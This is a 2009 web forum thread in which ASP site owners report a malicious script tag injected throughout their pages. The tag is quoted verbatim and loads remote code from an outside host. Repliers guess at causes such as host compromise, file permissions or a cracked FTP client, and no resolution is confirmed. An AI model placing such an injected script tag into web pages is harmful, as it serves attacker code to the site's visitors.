944,220 Members | Top Members by Rank

Ad:
  • ASP Discussion Thread
  • Unsolved
  • Views: 1386
  • ASP RSS
Oct 22nd, 2009
0

Possible SQL Injection attack

Expand Post »
Hi,

I just came across a piece of script that has been put into my source code throughout the site...and not by me.

Im not sure how they did it but im fearing this could get more serious and end up them hitting my db. Here is example(kind of) of the script im finding...
ASP Syntax (Toggle Plain Text)
  1. <script src="Http://www.domainname.com /a /a .php></script>
  2.  

HELP!!!!!!
Similar Threads
Reputation Points: 10
Solved Threads: 0
Newbie Poster
kegathor is offline Offline
8 posts
since Sep 2009
Oct 22nd, 2009
0
Re: Possible SQL Injection attack
I'd check your database for rouge entries, users.

Double-check your file permissions, and if your on a shared host, it might be a bad security setup in the host, allowing access to the files. Are these scripts served from the db or are they in the source files?

Do you have a better example of the scripts? (and the domain, if the site is in production, would be useful).
Reputation Points: 18
Solved Threads: 21
Junior Poster
codejoust is offline Offline
180 posts
since Jul 2009
Oct 22nd, 2009
0
Re: Possible SQL Injection attack
Click to Expand / Collapse  Quote originally posted by codejoust ...
I'd check your database for rouge entries, users.

Double-check your file permissions, and if your on a shared host, it might be a bad security setup in the host, allowing access to the files. Are these scripts served from the db or are they in the source files?

Do you have a better example of the scripts? (and the domain, if the site is in production, would be useful).
Im using an external ISP to host the site. These scripts were put into the ASP. The DB seems to be untouched...for now.

This is the exact script that was entered into the site.

ASP Syntax (Toggle Plain Text)
  1. <script src=http://caplast.sk/galeria/profil.php ></script>

Im using google analytics which contains "Document.Write". Might they be using this to enter it into the pages?
Reputation Points: 10
Solved Threads: 0
Newbie Poster
kegathor is offline Offline
8 posts
since Sep 2009
Oct 22nd, 2009
0
Re: Possible SQL Injection attack
Heloo, my site is attacked by this script.

all of aspx, html, js... files have got it
ASP Syntax (Toggle Plain Text)
  1. 1.
  2. <script src=http://caplast.sk/galeria/profil.php ></script>

I cant remove it day by day ...

pls help
Reputation Points: 10
Solved Threads: 0
Newbie Poster
meohoang194 is offline Offline
2 posts
since Oct 2009
Oct 22nd, 2009
0
Re: Possible SQL Injection attack
See here:
Hi,

Já vi virus causando isso, como está acontecendo no provedor, trata-se de um virus nos servidores do provedor. I have seen virus causing it, as is happening in the provider, it is a virus on the servers of the provider.

O problema é que nunca admitem, se pelo menos resolverem, ótimo, do contrário o jeito é trocar de provedor. The problem is that they never admit, at least resolve, great, otherwise we'll just switch to another provider.

http://translate.google.com/translat...ial%26hs%3DQ0O
Providers try to push the blame on you (saying it is flawed for its application), but if your application is not capable of uploading files, it is virtually impossible to modify the files in your application - to change, your ISP also has a much great fault.

Also, it might be a hole in your application. Is it online now?
Reputation Points: 18
Solved Threads: 21
Junior Poster
codejoust is offline Offline
180 posts
since Jul 2009
Oct 22nd, 2009
0
Re: Possible SQL Injection attack
My site is http://www.mmmode.com.vn

I use a crack portable FTP CUTE, whether there is reason about this malware ?

MY ISP has got alot of virus, malware n etc .... they are so bad support
Reputation Points: 10
Solved Threads: 0
Newbie Poster
meohoang194 is offline Offline
2 posts
since Oct 2009

This thread is more than three months old

No one has posted to this discussion for at least three months. Please let old threads die and do not reply to them unless you feel you have something new and valuable to contribute that absolutely must be added to make the discussion complete. Otherwise, please start a new thread in this forum instead.
Message:
Previous Thread in ASP Forum Timeline: asp page
Next Thread in ASP Forum Timeline: SQL Injection Attacks





About Us | Contact Us | Advertise | Acceptable Use Policy
Forum Index | Build Custom RSS Feed


Follow us on Twitter


© 2011 DaniWeb® LLC